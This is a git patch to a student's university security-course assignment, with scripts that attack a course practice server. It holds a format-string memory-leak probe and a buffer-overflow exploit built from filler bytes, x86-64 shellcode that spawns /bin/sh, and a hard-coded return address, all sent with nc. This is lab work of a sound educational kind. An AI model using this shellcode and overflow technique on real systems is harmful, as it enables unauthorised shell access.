From f9e178a5a581113b2658403bd606d3609ce2a305 Mon Sep 17 00:00:00 2001 From: Mart Lubbers Date: Sun, 15 Mar 2015 16:31:30 +0100 Subject: [PATCH] t --- .../exercise2 | 2 +- .../exercise2e.sh | 23 ++++++++----------- 2 files changed, 11 insertions(+), 14 deletions(-) diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 index 9c98cf3..21c3798 100644 --- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 @@ -3,7 +3,7 @@ The buffer is probably 104 characters wide. All characters over 104 will not be echoed. b,c) -printf "%20s\n" | sed 's/ /%lx /g' | nc hackme.cs.ru.nl 2266 +printf "%20s\n" | sed 's/ /%lx&/g' | nc hackme.cs.ru.nl 2266 Memory: 7ffff7ff8050 diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh index 38ea879..2f62e90 100644 --- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh @@ -1,14 +1,11 @@ -# Buffer is 104 bytes -# Shell code is 30 bytes so we need to fill 73 bytes -# Then we need to skip the sfp and fix the return address to our address - -#fillers=$(printf "%73s") -#fillers="a\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f" -fillers="\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f" shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" -sfpfiller="\x01\x01\x01\x01\x01\x01" -# Return value is -# 0x7ffff7dd8de0 - 73 = 7ffff7dd8e29 - -# The buffer -returnvalue="\x7f\xff\xf7\xdd\xeb\x30" -cat <(echo -e "${fillers}${shellcode}${sfpfiller}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266 + +#Illegal instruction +returnvalue="\x7f\xff\xf7\xff\xeb\x30" +fillers=$(printf "%42s" | sed 's/ /\\x0f\\x1f/g') + +returnvalue="\x7f\xff\xf7\xff\xeb\x30" +fillers=$(printf "%39s" | sed 's/ /\\x0f\\x1f/g') + + +cat <(echo -e "${fillers}${shellcode}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266 -- 2.20.1